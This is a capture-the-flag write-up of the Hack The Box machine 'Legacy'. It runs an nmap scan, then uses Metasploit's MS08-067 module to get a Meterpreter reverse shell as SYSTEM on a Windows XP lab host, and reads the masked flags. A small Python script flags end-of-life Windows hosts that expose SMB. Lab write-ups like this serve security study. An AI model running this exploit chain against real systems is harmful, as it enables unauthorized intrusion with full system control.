Legacy (HTB)

OS: Windows
IP: 10.10.10.4
Machine Author: ch4p

Nmap:-

root@kali:~/Desktop# nmap -sS -sV -Pn 10.10.10.4
Starting Nmap 7.50 ( https://nmap.org ) at 2017-12-17 14:28 EST
Nmap scan report for 10.10.10.4
Host is up (0.16s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.53 seconds


Vulnerability:- The target machine is running the SMB service on Windows XP, so we can use the netapi exploit (MS08-067) that is available in Metasploit.
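The reasoning above (SMB open on a Windows XP host means MS08-067 applies) is easy to turn into a repeatable triage check. The script below is an added example, not part of this write-up or any tool it uses: it parses the nmap output shown above (embedded as a constructed sample), picks out open SMB ports and the OS CPE from the Service Info line, and reports end-of-life Windows hosts that still expose 139/445 so they can be patched or fenced off. The list of end-of-life CPE names is this example's own assumption.

```python
import re

# Constructed sample: the nmap -sV output from this write-up, embedded so the
# check runs offline against the lab host 10.10.10.4.
NMAP_OUTPUT = """\
Nmap scan report for 10.10.10.4
Host is up (0.16s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)\s*(.*)$")
# Assumed list of end-of-life Windows releases in the MS08-067 (KB958644) affected set.
EOL_WINDOWS = {"windows_2000": "Windows 2000", "windows_xp": "Windows XP",
               "windows_server_2003": "Windows Server 2003"}
CPE_RE = re.compile(r"cpe:/o:microsoft:(" + "|".join(EOL_WINDOWS) + r")\b")

def parse_nmap(text):
    """Return (host, {open_port: service}, {eol_cpe_names}) from normal-format nmap output."""
    host, open_ports, os_hits = None, {}, set()
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            host = m.group(1)
            continue
        m = PORT_RE.match(line)
        if m and m.group(3) == "open":          # ignore closed/filtered ports
            open_ports[int(m.group(1))] = m.group(4)
            continue
        if line.startswith("Service Info:"):    # OS guess comes from the CPE strings
            os_hits.update(CPE_RE.findall(line))
    return host, open_ports, os_hits

def smb_exposure_findings(text):
    """Flag a host that exposes SMB (139/445) from an end-of-life Windows release."""
    host, open_ports, os_hits = parse_nmap(text)
    smb_ports = sorted(p for p in open_ports if p in (139, 445))
    if not smb_ports:
        return []
    return [f"{host}: SMB open on {smb_ports} from {EOL_WINDOWS[cpe]} "
            f"(end-of-life; confirm KB958644/MS08-067 state, block 139/445 at the boundary)"
            for cpe in sorted(os_hits)]

if __name__ == "__main__":
    for finding in smb_exposure_findings(NMAP_OUTPUT):
        print(finding)
```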


Vulnerability Description:- This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service. This module is capable of bypassing NX on some operating systems and service packs. The correct target must be used to prevent the Server Service (along with a dozen others in the same process) from crashing. Windows XP targets seem to handle multiple successful exploitation events, but 2003 targets will often crash or hang on subsequent attempts. This is just the first version of this module; full support for NX bypass on 2003, along with other platforms, is still in development.


Exploit:- MS08-067 Microsoft Server Service Relative Path Stack Corruption

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 10.10.10.4
RHOST => 10.10.10.4
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse TCP handler on 10.10.*.*:4444
[*] 10.10.10.4:445 - Automatically detecting the target...
[*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.10.10.4:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957487 bytes) to 10.10.10.4
[*] Meterpreter session 1 opened (10.10.*.*:4444 -> 10.10.10.4:1029) at 2017-12-17 15:45:50 -0500
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 624 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>


Using this exploit we got SYSTEM-level privileges (NT AUTHORITY\SYSTEM), so no separate privilege escalation step was needed.


Flags:-


C:\Documents and Settings\john\Desktop>type user.txt
**********************
C:\Documents and Settings\Administrator\Desktop>type root.txt
**********************

~ Hack the World and Stay Noob
